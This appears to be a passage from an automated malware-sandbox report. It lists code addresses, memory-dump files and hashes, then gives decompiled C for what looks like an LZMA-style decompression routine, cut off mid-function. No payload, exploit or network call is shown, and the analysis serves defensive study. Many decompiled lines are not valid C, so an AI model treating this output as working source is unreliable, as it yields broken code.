                                                                                                                              0x004068df
                                                                                                                              0x004068e2
                                                                                                                              0x004068e6
                                                                                                                              0x004068e8
                                                                                                                              0x004068e8
                                                                                                                              0x004068e9
                                                                                                                              0x004068ec
                                                                                                                              0x004068c2
                                                                                                                              0x004068c2
                                                                                                                              0x004068ca
                                                                                                                              0x004068cf
                                                                                                                              0x004068d1
                                                                                                                              0x004068d4
                                                                                                                              0x004068d4
                                                                                                                              0x004068ef
                                                                                                                              0x004068f6
                                                                                                                              0x00000000
                                                                                                                              0x004068f8
                                                                                                                              0x00000000
                                                                                                                              0x004068f8
                                                                                                                              0x00000000
                                                                                                                              0x00406594
                                                                                                                              0x00406597
                                                                                                                              0x004065cd
                                                                                                                              0x004066fd
                                                                                                                              0x004066fd
                                                                                                                              0x004066fd
                                                                                                                              0x004066fd
                                                                                                                              0x00406700
                                                                                                                              0x00406700
                                                                                                                              0x00406703
                                                                                                                              0x00406705
                                                                                                                              0x0040698f
                                                                                                                              0x00000000
                                                                                                                              0x0040698f
                                                                                                                              0x0040670b
                                                                                                                              0x0040670e
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406714
                                                                                                                              0x00406718
                                                                                                                              0x0040671b
                                                                                                                              0x0040671b
                                                                                                                              0x0040671b
                                                                                                                              0x00000000
                                                                                                                              0x0040671b
                                                                                                                              0x00406599
                                                                                                                              0x0040659b
                                                                                                                              0x0040659d
                                                                                                                              0x0040659f
                                                                                                                              0x004065a2
                                                                                                                              0x004065a3
                                                                                                                              0x004065a5
                                                                                                                              0x004065a7
                                                                                                                              0x004065aa
                                                                                                                              0x004065ad
                                                                                                                              0x004065c3
                                                                                                                              0x004065c8
                                                                                                                              0x00406600
                                                                                                                              0x00406600
                                                                                                                              0x00406604
                                                                                                                              0x00406630
                                                                                                                              0x00406632
                                                                                                                              0x00406639
                                                                                                                              0x0040663c
                                                                                                                              0x0040663f
                                                                                                                              0x0040663f
                                                                                                                              0x00406644
                                                                                                                              0x00406644
                                                                                                                              0x00406646
                                                                                                                              0x00406649
                                                                                                                              0x00406650
                                                                                                                              0x00406653
                                                                                                                              0x00406680
                                                                                                                              0x00406680
                                                                                                                              0x00406683
                                                                                                                              0x00406686
                                                                                                                              0x004066fa
                                                                                                                              0x004066fa
                                                                                                                              0x004066fa
                                                                                                                              0x00000000
                                                                                                                              0x004066fa
                                                                                                                              0x00406688
                                                                                                                              0x0040668e
                                                                                                                              0x00406691
                                                                                                                              0x00406694
                                                                                                                              0x00406697
                                                                                                                              0x0040669a
                                                                                                                              0x0040669d
                                                                                                                              0x004066a0
                                                                                                                              0x004066a3
                                                                                                                              0x004066a6
                                                                                                                              0x004066a9
                                                                                                                              0x004066c2
                                                                                                                              0x004066c4
                                                                                                                              0x004066c7
                                                                                                                              0x004066c8
                                                                                                                              0x004066cb
                                                                                                                              0x004066cd
                                                                                                                              0x004066d0
                                                                                                                              0x004066d2
                                                                                                                              0x004066d4
                                                                                                                              0x004066d7
                                                                                                                              0x004066d9
                                                                                                                              0x004066dc
                                                                                                                              0x004066e0
                                                                                                                              0x004066e2
                                                                                                                              0x004066e2
                                                                                                                              0x004066e3
                                                                                                                              0x004066e6
                                                                                                                              0x004066e9
                                                                                                                              0x004066ab
                                                                                                                              0x004066ab
                                                                                                                              0x004066b3
                                                                                                                              0x004066b8
                                                                                                                              0x004066ba
                                                                                                                              0x004066bd
                                                                                                                              0x004066bd
                                                                                                                              0x004066ec
                                                                                                                              0x004066f3
                                                                                                                              0x0040667d
                                                                                                                              0x0040667d
                                                                                                                              0x0040667d
                                                                                                                              0x0040667d
                                                                                                                              0x00000000
                                                                                                                              0x004066f5
                                                                                                                              0x00000000
                                                                                                                              0x004066f5
                                                                                                                              0x004066f3
                                                                                                                              0x00406606
                                                                                                                              0x00406609
                                                                                                                              0x0040660b
                                                                                                                              0x0040660e
                                                                                                                              0x00406611
                                                                                                                              0x00406614
                                                                                                                              0x00406616
                                                                                                                              0x00406619
                                                                                                                              0x0040661c
                                                                                                                              0x0040661c
                                                                                                                              0x0040661f
                                                                                                                              0x0040661f
                                                                                                                              0x00406622
                                                                                                                              0x00406629
                                                                                                                              0x004065fd
                                                                                                                              0x004065fd
                                                                                                                              0x004065fd
                                                                                                                              0x004065fd
                                                                                                                              0x00000000
                                                                                                                              0x0040662b
                                                                                                                              0x00000000
                                                                                                                              0x0040662b
                                                                                                                              0x00406629
                                                                                                                              0x004065af
                                                                                                                              0x004065b2
                                                                                                                              0x004065b4
                                                                                                                              0x004065b7
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406316
                                                                                                                              0x00406316
                                                                                                                              0x0040631a
                                                                                                                              0x0040695f
                                                                                                                              0x00000000
                                                                                                                              0x0040695f
                                                                                                                              0x00406320
                                                                                                                              0x00406323
                                                                                                                              0x00406326
                                                                                                                              0x00406329
                                                                                                                              0x0040632c
                                                                                                                              0x0040632f
                                                                                                                              0x00406332
                                                                                                                              0x00406334
                                                                                                                              0x00406337
                                                                                                                              0x0040633a
                                                                                                                              0x0040633d
                                                                                                                              0x0040633f
                                                                                                                              0x0040633f
                                                                                                                              0x0040633f
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004064a1
                                                                                                                              0x004064a1
                                                                                                                              0x004064a5
                                                                                                                              0x0040696b
                                                                                                                              0x00000000
                                                                                                                              0x0040696b
                                                                                                                              0x004064ab
                                                                                                                              0x004064ae
                                                                                                                              0x004064b1
                                                                                                                              0x004064b4
                                                                                                                              0x004064b6
                                                                                                                              0x004064b6
                                                                                                                              0x004064b6
                                                                                                                              0x004064b9
                                                                                                                              0x004064bc
                                                                                                                              0x004064bf
                                                                                                                              0x004064c2
                                                                                                                              0x004064c5
                                                                                                                              0x004064c8
                                                                                                                              0x004064c9
                                                                                                                              0x004064cb
                                                                                                                              0x004064cb
                                                                                                                              0x004064cb
                                                                                                                              0x004064ce
                                                                                                                              0x004064d1
                                                                                                                              0x004064d4
                                                                                                                              0x004064d7
                                                                                                                              0x004064d7
                                                                                                                              0x004064d7
                                                                                                                              0x004064da
                                                                                                                              0x004064dc
                                                                                                                              0x004064dc
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040671e
                                                                                                                              0x0040671e
                                                                                                                              0x0040671e
                                                                                                                              0x00406722
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406728
                                                                                                                              0x0040672b
                                                                                                                              0x0040672e
                                                                                                                              0x00406731
                                                                                                                              0x00406733
                                                                                                                              0x00406733
                                                                                                                              0x00406733
                                                                                                                              0x00406736
                                                                                                                              0x00406739
                                                                                                                              0x0040673c
                                                                                                                              0x0040673f
                                                                                                                              0x00406742
                                                                                                                              0x00406745
                                                                                                                              0x00406746
                                                                                                                              0x00406748
                                                                                                                              0x00406748
                                                                                                                              0x00406748
                                                                                                                              0x0040674b
                                                                                                                              0x0040674e
                                                                                                                              0x00406751
                                                                                                                              0x00406754
                                                                                                                              0x00406757
                                                                                                                              0x0040675b
                                                                                                                              0x0040675d
                                                                                                                              0x00406760
                                                                                                                              0x00000000
                                                                                                                              0x00406762
                                                                                                                              0x004064df
                                                                                                                              0x004064df
                                                                                                                              0x00000000
                                                                                                                              0x004064df
                                                                                                                              0x00406760
                                                                                                                              0x00406995
                                                                                                                              0x004069b7
                                                                                                                              0x004069bd
                                                                                                                              0x004069bf
                                                                                                                              0x004069c6
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00405fc4
                                                                                                                              0x004069cc
                                                                                                                              0x004069cc
                                                                                                                              0x00000000

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.201984153.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.201978360.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.201994006.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202000566.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202075629.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202089293.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202121649.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202148009.000000000042F000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202159816.0000000000433000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202170813.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202189588.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202210290.000000000043C000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c94337aa44be19872a05e7fe324c1f72408cb83bc4afcb37e89916e28dd5cdb7
                                                                                                                              • Instruction ID: 3ccfc7c80e99de65fa6db0e0edc8679980b1d0ea62cd2807200041591328ae3c
                                                                                                                              • Opcode Fuzzy Hash: c94337aa44be19872a05e7fe324c1f72408cb83bc4afcb37e89916e28dd5cdb7
                                                                                                                              • Instruction Fuzzy Hash: D98187B1D00229CBDF24CFA8C8447AEBBB1FB44305F11816AD856BB2C1C7785A96CF44
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004063D0, Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 98%
                                                                                                                              			E004063D0() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M004069D4))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
